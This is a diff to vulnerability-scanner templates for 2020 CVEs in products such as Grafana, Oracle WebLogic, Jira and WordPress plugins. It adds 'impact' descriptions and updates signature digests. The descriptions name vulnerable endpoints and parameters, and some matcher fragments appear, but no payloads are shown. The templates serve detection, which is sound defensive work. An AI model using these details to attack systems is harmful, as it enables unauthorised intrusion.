-# digest: 490a0046304402203a2a3507f7d0324b22c10aeee3c5e1a9709bce28c40b1c9e317168e8fa68aafe02204f40140bdfae140e890335dd0528a1aed8744b3aa01fefe84685b648afd77f39:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022041e73904e890b286f1ad2d2dc6d657317a478a74314a0aee19dea69cbb01a51d02202cba245a83cfeb2f343d1097a58e134964b7420eee2811334f57c8a4c62dde39:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-13258.yaml b/http/cves/2020/CVE-2020-13258.yaml
index 4a851efde7..8295d9e656 100644
--- a/http/cves/2020/CVE-2020-13258.yaml
+++ b/http/cves/2020/CVE-2020-13258.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Contentful through 2020-05-21 for Python contains a reflected cross-site scripting vulnerability via the api parameter to the-example-app.py.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade Contentful to a version that is not vulnerable to CVE-2020-13258 or apply the necessary patches provided by the vendor.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100d6a927c4d7bd230b5cddb5c73c9239435c5a552df2e849ba61015607950e3615022006c4f49979cfddc4a8230875aae7fcb0757f6acea7acef3276ae6aa17354523c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c7f57e040eba43aee372715c10317db1d25a7603e4d39589feb0a7d928e1cbdb02202e4fe0b8373d2adcebf96fbc6cecda353895e72441d9b8cef39c9a454add0c13:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-13379.yaml b/http/cves/2020/CVE-2020-13379.yaml
index cbd378718c..6004334d7c 100644
--- a/http/cves/2020/CVE-2020-13379.yaml
+++ b/http/cves/2020/CVE-2020-13379.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Grafana 3.0.1 through 7.0.1 is susceptible to server-side request forgery via the avatar feature, which can lead to remote code execution. Any unauthenticated user/client can make Grafana send HTTP requests to any URL and return its result. This can be used to gain information about the network Grafana is running on, thereby potentially enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    An attacker can exploit this vulnerability to bypass security controls, access internal resources, and potentially perform further attacks.
   remediation: Upgrade to 6.3.4 or higher.
   reference:
     - https://github.com/advisories/GHSA-wc9w-wvq2-ffm9
@@ -54,4 +56,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220285424633bf8f4eda0f4c44349b27a6805515f06f192b714caf155184b03e9a7022100e8f456797cea5911822710b8ed194f1cb3cce7840e0fd98e7846f0f90ad6724e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100a90026701beb07958483b85574e05f27997fdc7870e6d63bdcbedcfd2df3b361022100e1ee9031cc5850f6d04d014d16f454c716e0b4faa19f8907704d3a16816e810e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-13405.yaml b/http/cves/2020/CVE-2020-13405.yaml
index c713e853ce..b0f0e813b0 100644
--- a/http/cves/2020/CVE-2020-13405.yaml
+++ b/http/cves/2020/CVE-2020-13405.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Microweber before 1.1.20 is susceptible to information disclosure via userfiles/modules/users/controller/controller.php. An attacker can disclose the users database via a /modules/ POST request and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information.
   remediation: |
     Upgrade Microweber to version 1.1.20 or later to mitigate the vulnerability.
   reference:
@@ -52,4 +54,4 @@ http:
           - 'status_code==200'
           - 'contains(header,"text/html")'
         condition: and
-# digest: 4a0a0047304502200d9b6e39b220c05e1a6db3fe87e9fb49a03c13306d5a42228f4275d26a0e8632022100c72d35b272c10697182a3c1a36f9b35696af0fcb4baf50d41593781fa63d48d3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502202895601cfa8de7d79dfc8daab91e945b31878ca0539e5e12f93f47904a14b9c8022100ae91dc49b3357b8f51c7f2dd997835de102b0c23f47d365d5295edd1ddef4ab0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-13483.yaml b/http/cves/2020/CVE-2020-13483.yaml
index 875267b7b4..12c4740758 100644
--- a/http/cves/2020/CVE-2020-13483.yaml
+++ b/http/cves/2020/CVE-2020-13483.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu,3th1c_yuk1
   severity: medium
   description: The Web Application Firewall in Bitrix24 up to and including 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to a patched version of Bitrix24 (version >20.0.0) to mitigate this vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502210086a8ebebab08126e7f30ed13f9dc4f8560701c43e5acc7e01b4d353d051cd5eb02203f95643279a5253d0b4dfd4c2d76432f3669546133bbdec261221d6ffbf53c1c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502207530e16db3290c098635fcf19f5ad38a048b2ee77cff4a3e6f500ca6605d0c11022100b6a3f1edf2b36949b864b54640e415c5e3a6ef2d717150a9cda46abb062bdbc4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-13700.yaml b/http/cves/2020/CVE-2020-13700.yaml
index f35233ac1d..852fe83e0e 100644
--- a/http/cves/2020/CVE-2020-13700.yaml
+++ b/http/cves/2020/CVE-2020-13700.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WordPresss acf-to-rest-ap through 3.1.0 allows an insecure direct object reference via permalinks manipulation, as demonstrated by a wp-json/acf/v3/options/ request that can read sensitive information in the wp_options table such as the login and pass values.
+  impact: |
+    An attacker can exploit this vulnerability to access sensitive data, such as user information or administrative credentials.
   remediation: |
     Update the acf-to-rest-api plugin to version >3.1.0 or apply the latest security patches.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220129c59c9eff947dd646c04d1811a26e5eff5ab5a93f9e8acb438e0fecc3d646202203d98194f64c937a426de42a251440abb005c3dea29c40182022d4062869955e6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502202671e4ca3daeaf2d82238b90473897e41cab4321046c54488c81396a7eccafa9022100aae19829e48c00667979aced447f8a63d574a6b8efb1b67703373f4491c78a64:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-13820.yaml b/http/cves/2020/CVE-2020-13820.yaml
index 1d081b5755..7b4e9f4a4e 100644
--- a/http/cves/2020/CVE-2020-13820.yaml
+++ b/http/cves/2020/CVE-2020-13820.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Extreme Management Center 8.4.1.24 contains a cross-site scripting vulnerability via a parameter in a GET request. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patch or upgrade to a non-vulnerable version of Extreme Management Center.
   reference:
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a0048304602210090230f8615e896d077c23efe1561c1382ec6743a99a6065e6a85e17935a1bfa6022100d30405bddc694738a08c5a2cf7c10c6065b827dc505389b02815dfec66fdb60c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402206aa6f1278e50c5b1da59559f78df48e43000e6b0b9cc2c5f486a071ee779b10d02206e88661dfedeb1f54d9f86bed446a1e082838c060a54bb646333628f066a905e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-13927.yaml b/http/cves/2020/CVE-2020-13927.yaml
index a0f0fd3e05..2443529dfc 100644
--- a/http/cves/2020/CVE-2020-13927.yaml
+++ b/http/cves/2020/CVE-2020-13927.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Airflow's Experimental API prior 1.10.11 allows all API requests without authentication.
+  impact: |
+    Allows unauthorized access to Airflow Experimental REST API
   remediation: |
     From Airflow 1.10.11 forward, the default has been changed to deny all requests by default.  Note - this change fixes it for new installs but existing users need to change their config to default `[api]auth_backend = airflow.api.auth.backend.deny_all` as mentioned in the Updating Guide linked in the references.
   reference:
@@ -43,4 +45,4 @@ http:
           - '"dag_id":'
           - '"items":'
         condition: and
-# digest: 4a0a004730450220131c42c4749a16f0acd4a00b4588f913d9a198d878005bf5fbd1521a2e4fac98022100dd3954c78921777e36b72a77c64b9f1e650153f984e4c56a8e0f90aa1fc0889f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201ac61ec3fee50930dd7880d2d7b45379c20326ee46fde2bbbd3e55f4afa711e30221009d09b53979aed99ac3aed3ad338cead7f92325c976238bc81ab3c41c2dc4bc10:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-13937.yaml b/http/cves/2020/CVE-2020-13937.yaml
index 0ed673d16e..801aa8303e 100644
--- a/http/cves/2020/CVE-2020-13937.yaml
+++ b/http/cves/2020/CVE-2020-13937.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1,  3.0.2, 3.1.0, 4.0.0-alpha have one REST API which exposed Kylin's configuration information without authentication.
+  impact: |
+    An attacker can gain sensitive information from the exposed configuration file, potentially leading to further attacks.
   remediation: |
     Secure the configuration file by restricting access permissions and implementing proper access controls.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502200e5cb91273d54d05a5bc173b0a52a66058fa69c0bf00079944c978ef14ec9a15022100f91360b169641485d2dc533ab6b1c802bdfcaf5d901e695c8c378bd711cc3e3e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e4d3091d0bd7bc50bf370f8c75bbd6013ca164a785c20aede78876dc96b3993602205d37f395e0c06e1edd97643df0a16804a0196b450a7d467b40f42df673264999:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-13942.yaml b/http/cves/2020/CVE-2020-13942.yaml
index 10139848d5..6130152e37 100644
--- a/http/cves/2020/CVE-2020-13942.yaml
+++ b/http/cves/2020/CVE-2020-13942.yaml
@@ -9,6 +9,8 @@ info:
     offers the possibility to call static Java classes from the JDK
     that could execute code with the permission level of the running Java process.
     This vulnerability affects all versions of Apache Unomi prior to 1.5.2.
+  impact: |
+    Successful exploitation of this vulnerability can allow an attacker to execute arbitrary code on the affected server.
   remediation: Apache Unomi users should upgrade to 1.5.2 or later.
   reference:
     - https://securityboulevard.com/2020/11/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/
@@ -79,4 +81,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402204bf9c3e2c67ab22dc9e20c84388102383f55183cb5211c38a15f221588d1d02c02207b1aa1d751ccea09e75ad3e2a30ec24b45a12a405e02bfdb2ec67eaaf8522226:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022061821fa06fd936b15f07620865ed57eff345723044459cde1c9f61aa7e1665ef022100bb3a68ff30214c5194a742c699e9ffecb38e43cb3ac1f98e7e1320806b57a2c2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-13945.yaml b/http/cves/2020/CVE-2020-13945.yaml
index 0b9c83d708..5abb02b0f0 100644
--- a/http/cves/2020/CVE-2020-13945.yaml
+++ b/http/cves/2020/CVE-2020-13945.yaml
@@ -5,6 +5,8 @@ info:
   author: pdteam
   severity: medium
   description: Apache APISIX 1.2, 1.3, 1.4, and 1.5 is susceptible to insufficiently protected credentials. An attacker can enable the Admin API and delete the Admin API access IP restriction rules. Eventually, the default token is allowed to access APISIX management data.
+  impact: |
+    The vulnerability could result in unauthorized access to sensitive information, leading to potential data breaches or unauthorized actions.
   remediation: |
     Upgrade to the latest version of Apache APISIX, which includes a fix for the vulnerability. Additionally, ensure that sensitive credentials are properly protected and stored securely.
   reference:
@@ -65,4 +67,4 @@ http:
       - type: regex
         regex:
           - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
-# digest: 4a0a004730450221009e5f7316d502d221cd7b17e320f22e1a15c2bd55bba281ab913ea1abfc82288a022056aa7909b60b5762205ae836b050372e780432a981be1dba773b5654cf331dce:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220510f775e113620a4eba97d0a7f9ac72d6a35842beb3bdb9f35c7cdccf00ae1c5022013b5975c248189e7d41aed6592b5c64a0de529819e083e36d4078d7fffd461cf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-14092.yaml b/http/cves/2020/CVE-2020-14092.yaml
index 847432ba01..dc06773b20 100644
--- a/http/cves/2020/CVE-2020-14092.yaml
+++ b/http/cves/2020/CVE-2020-14092.yaml
@@ -5,6 +5,8 @@ info:
   author: princechaddha
   severity: critical
   description: WordPress PayPal Pro plugin before 1.1.65 is susceptible to SQL injection via the 'query' parameter which allows for any unauthenticated user to perform SQL queries with the results output to a web page in JSON format.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Update to the latest version of the WordPress PayPal Pro plugin (1.1.65 or higher) to mitigate the SQL Injection vulnerability.
   reference:
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022030406bc6a734821c33d0741f0f745dd698437bd63a7fbcad9ef8addca7b0f25502207d47209c1f7b9119d14d66ccfd334f8a034297d761160e2a7ab1bc2582fef097:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100db7d325e01e9677946a65dc0857fd5cb4ea93721016c56e5a0fd02d7bc87f32202207cf22b98dd5e6a11f504d6a5cc60801d5ddbd6ea1e08c89fe11238c60d2a3e14:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-14144.yaml b/http/cves/2020/CVE-2020-14144.yaml
index 64f358e214..b1abae80ea 100644
--- a/http/cves/2020/CVE-2020-14144.yaml
+++ b/http/cves/2020/CVE-2020-14144.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Gitea 1.1.0 through 1.12.5 is susceptible to authenticated remote code execution, via the git hook functionality, in customer environments where the documentation is not understood (e.g., one viewpoint is that the dangerousness of this feature should be documented immediately above the ENABLE_GIT_HOOKS line in the config file). NOTE: The vendor has indicated this is not a vulnerability and states "This is a functionality of the software that is limited to a subset of accounts. If you give someone the privilege to execute arbitrary code on your server, they can execute arbitrary code on your server. We provide very clear warnings to users around this functionality and what it provides."
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
   remediation: Fixed in version 1.16.7.
   reference:
     - https://dl.gitea.io/gitea/1.16.6
@@ -98,4 +100,4 @@ http:
         regex:
           - name="last_commit" value="(.*)"
         internal: true
-# digest: 4a0a00473045022100a939408e13ec73f2a7dfa9beefe576f5d8504b37f35ea5b86b895bb638c56a13022016c74d0fc3eac8c2f4b1332cb816ecb77530b323c6c98b3dfa8977546aca12a1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f50306dd16698fa016620131006655e0b26fc51ca1d1a02b1a650b3ebd54608c02205e5f86d75e325057b78f3e949ccfe2a87fe948381e592ee4d300e8dd7f49e53c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-14179.yaml b/http/cves/2020/CVE-2020-14179.yaml
index f1a2b8b919..4e605dbe73 100644
--- a/http/cves/2020/CVE-2020-14179.yaml
+++ b/http/cves/2020/CVE-2020-14179.yaml
@@ -5,6 +5,8 @@ info:
   author: x1m_martijn
   severity: medium
   description: Atlassian Jira Server and Data Center before 8.5.8 and 8.6.0 through 8.11.1 are susceptible to information disclosure via the /secure/QueryComponent!Default.jspa endpoint. An attacker can view custom field names and custom SLA names.
+  impact: |
+    An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to further attacks.
   remediation: |
     Upgrade Atlassian Jira Server/Data Center to a version higher than 8.11.1 to mitigate the vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402206ac93d5a9eff95522b9b49d910e4fd821b0c28a7d909302f5d767c44d36b73ca02206aeaf1bf1a5f55ef6b1626ae54a8c5458119f46faf2c48ce221f36d8fad24337:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220056bd7942fb2cabd9c2ec21bfa6181394bd1d69db48ce53a6054f600edecba88022100ef59cf8dc468f7bc72dd97a00c88c363af792ae25bf1e052578e49fc707dcf51:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-14181.yaml b/http/cves/2020/CVE-2020-14181.yaml
index ce37b94521..bd4c9a5f60 100644
--- a/http/cves/2020/CVE-2020-14181.yaml
+++ b/http/cves/2020/CVE-2020-14181.yaml
@@ -5,6 +5,8 @@ info:
   author: bjhulst
   severity: medium
   description: Jira Server and Data Center is susceptible to information disclosure. An attacker can enumerate users via the /ViewUserHover.jspa endpoint and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. Affected versions are before version 7.13.6, from version 8.0.0 before 8.5.7, and from version 8.6.0 before 8.12.0.
+  impact: |
+    An attacker can gain access to sensitive information, potentially leading to further attacks.
   remediation: |
     Apply the necessary patches or updates provided by Atlassian to fix the vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100c70936f1bf2a8d6927e355f1faf7a4e469fe3e904e6e9c1970a098a2e39516c0022100c59e8151edc92ce611999136b47c6c7820213b059ceb7e72244be8ba9f9bb08a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022020f2ebd0784303ba9abc029db3502f6851e6c0d6126a18bfe4d009229960c5a0022100d28c7caedabd54dcc2f9ed456e96512a6f2216734f0fe4998e455a575c2f8d64:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-14408.yaml b/http/cves/2020/CVE-2020-14408.yaml
index 7a406f6b51..776d81bf97 100644
--- a/http/cves/2020/CVE-2020-14408.yaml
+++ b/http/cves/2020/CVE-2020-14408.yaml
@@ -5,6 +5,8 @@ info:
   author: edoardottt
   severity: medium
   description: Agentejo Cockpit 0.10.2 contains a reflected cross-site scripting vulnerability due to insufficient sanitization of the to parameter in the /auth/login route, which allows for injection of arbitrary JavaScript code into a web page's content.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version of Agentejo Cockpit or apply the vendor-provided patch to fix the XSS vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100df092144a4ec85eb7d50f099c1a197c04676fd821d1f4ad9ff0eb7b31194ab660220205c0d94250dc27085416c8f5ecad0d811d8382b0130aa7dbf8b0210937d2436:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022059b978d2d342be1fc5c41ee629b21c78ae0d45f2b455f482a056051566b52e2f022017295084096ed8261da58eb8facb2525f36f5810300a1d5629ad50fc10dffc84:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-14413.yaml b/http/cves/2020/CVE-2020-14413.yaml
index 831c9900f9..ae4c18289e 100644
--- a/http/cves/2020/CVE-2020-14413.yaml
+++ b/http/cves/2020/CVE-2020-14413.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: NeDi 1.9C is vulnerable to cross-site scripting because of an incorrect implementation of sanitize() in inc/libmisc.php. This function attempts to escape the SCRIPT tag from user-controllable values, but can be easily bypassed, as demonstrated by an onerror attribute of an IMG element as a Devices-Config.php?sta= value.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to a patched version of NeDi or apply the vendor-supplied patch to mitigate this vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450221009f27a2f5dfff6d6f598d6bc1409cd7c4b0c15ccede5ea538eaac15d28ed36b1a0220685e4c47db92da426703ecfed50f6b93c2e97cb3bba732e06545df62f3b62743:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100837e039c7ca6aa1b4aff16cc832d052dad372698ff02bd83ce8a5568cf28b5ce022049435d243627cbdf38cb8e3cdfcd74ffa59f4e2289adbdab98f86bbfad782bf0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-14750.yaml b/http/cves/2020/CVE-2020-14750.yaml
index d5422bb301..0468048928 100644
--- a/http/cves/2020/CVE-2020-14750.yaml
+++ b/http/cves/2020/CVE-2020-14750.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Oracle WebLogic Server 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised machine without entering necessary credentials. See also CVE-2020-14882, which is addressed in the October 2020 Critical Patch Update.
+  impact: |
+    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands with the privileges of the WebLogic server.
   remediation: |
     Apply the latest security patches provided by Oracle to mitigate this vulnerability.
   reference:
@@ -72,5 +74,4 @@ http:
         part: body
         regex:
           - '<html><head></head><body>(.*)</body></html>'
-
-# digest: 4a0a00473045022024a4eaeceaf3d4e2cf6f0b4d6ef752524c3f6868fd5673e5cf837e12d0554f8e022100864b6a87f7c952907e661a2c4beeafe0b2df4f70ae650272655d4d96a8405b95:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100d456332b8b00412663a85fa0990e2e2d451bd39b300c0f69f35e952187acf8c4022100d9414ed1d90700b4e309e66e34bc427dc0f539d342a40f331848d61b23ae2feb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-14864.yaml b/http/cves/2020/CVE-2020-14864.yaml
index 2108a7608b..48b49387d1 100644
--- a/http/cves/2020/CVE-2020-14864.yaml
+++ b/http/cves/2020/CVE-2020-14864.yaml
@@ -5,6 +5,8 @@ info:
   author: Ivo Palazzolo (@palaziv)
   severity: high
   description: Oracle Business Intelligence Enterprise Edition 5.5.0.0.0, 12.2.1.3.0, and 12.2.1.4.0 are vulnerable to local file inclusion vulnerabilities via "getPreviewImage."
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files, execute arbitrary code, or gain unauthorized access to the system.
   remediation: |
     Apply the latest security patches and updates provided by Oracle to fix this vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022060672c2bacae8bce7aac79a43b615cd66f11b27fbf041d5bdf1615b04911577e022062aecd63689f2bb764cd2d2ac6bf2813c7f32f0e637005ea9da92c08c35cecc1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e91d08e37838aae2ce611f9b4ac2b93ed834c193b6be33fc47bcd0d1c59c9812022100da22aec5a8e34563f5aced0e87f6c5321fbe70895303cefaf6669a51244d922e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-14882.yaml b/http/cves/2020/CVE-2020-14882.yaml
index dfd33aa5de..4f45e92bf0 100644
--- a/http/cves/2020/CVE-2020-14882.yaml
+++ b/http/cves/2020/CVE-2020-14882.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0
   severity: critical
   description: Oracle WebLogic Server contains an easily exploitable remote command execution vulnerability which allows unauthenticated attackers with network access via HTTP to compromise the server.
+  impact: |
+    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands with the privileges of the affected application.
   remediation: |
     Apply the latest security patches provided by Oracle to fix the vulnerability.
   reference:
@@ -43,4 +45,4 @@ http:
         part: interactsh_protocol
         words:
           - "http"
-# digest: 490a00463044022022bf4ece1c27fcdfef075d285c478947f1645e7c158bb495c2804fbdc82807340220203b2ecb3793a8956f3bbd531d8887db20ea99663d40cf932b986da17592d59a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402205eb0912e2707b45b9fdf368a01db25ae86882a80677b73bd29e40d00b35d11b00220373079135d00eaf19e80316f86126b130015789327b2ceece3996915d4f81453:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-14883.yaml b/http/cves/2020/CVE-2020-14883.yaml
index 282e4e45ed..26537f6002 100644
--- a/http/cves/2020/CVE-2020-14883.yaml
+++ b/http/cves/2020/CVE-2020-14883.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     The Oracle Fusion Middleware WebLogic Server admin console in versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 is vulnerable to an easily exploitable vulnerability that allows high privileged attackers with network access via HTTP to compromise Oracle WebLogic Server.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the necessary patches or updates provided by Oracle to mitigate this vulnerability.
   reference:
@@ -58,4 +60,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100817e210b7dacf19fdb759a03dc56be1dad63e593bdc6076a54680b07b53fdf87022024335fbb6de8fec37818721d1cc02c4f85b04031c31c17a605e6ff3792f32bdd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100cfb24b3164ac17ca9a95b186cce7c22d1cc8b3bd552dd9312e81624ab372d091022100a8a6793beef291f8ed768d36dca9fd423d950977586b19f6ddb087d0667e5145:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-15050.yaml b/http/cves/2020/CVE-2020-15050.yaml
index 16fdd4dad0..be39f5d2a4 100644
--- a/http/cves/2020/CVE-2020-15050.yaml
+++ b/http/cves/2020/CVE-2020-15050.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: high
   description: Suprema BioStar before 2.8.2 Video Extension allows remote attackers can read arbitrary files from the server via local file inclusion.
+  impact: |
+    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.
   remediation: |
     Upgrade Suprema BioStar to version 2.8.2 or later to fix the LFI vulnerability.
   reference:
@@ -38,4 +40,4 @@ http:
           - "fonts"
           - "extensions"
         condition: and
-# digest: 4a0a00473045022100a7a7426f07606374ae470482d9e5cb3756f952b0fe4b27270fa716ceb1ad8099022055d30d35edf31486e18e1c48c8323d1649df54bc19c14c49503de89ca7bae2d1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100980895d456e61b22f2bc979674222de3aeedc3a59ee8fff237d3a72fe0a0cf0402200e998e33378d13efd2df1cc30979fb22aed02347b717dbd9feb36a342eae43c3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-15129.yaml b/http/cves/2020/CVE-2020-15129.yaml
index 6b2b16ca6e..409c83e1c7 100644
--- a/http/cves/2020/CVE-2020-15129.yaml
+++ b/http/cves/2020/CVE-2020-15129.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0
   severity: medium
   description: Traefik before 1.7.26, 2.2.8, and 2.3.0-rc3 contains an open redirect vulnerability in the X-Forwarded-Prefix header. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can manipulate the redirect URL and trick users into visiting malicious websites.
   remediation: |
     Apply the vendor-provided patch or upgrade to a non-vulnerable version of Traefik.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 302
-# digest: 4a0a00473045022100a3d5c77fc24434146ddd7065091b563932860963994a44a20fd21a9fe45b930a02203edeff706f61921332483c5834d036dcfc7724064cb62abd901a28987c6f5f06:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
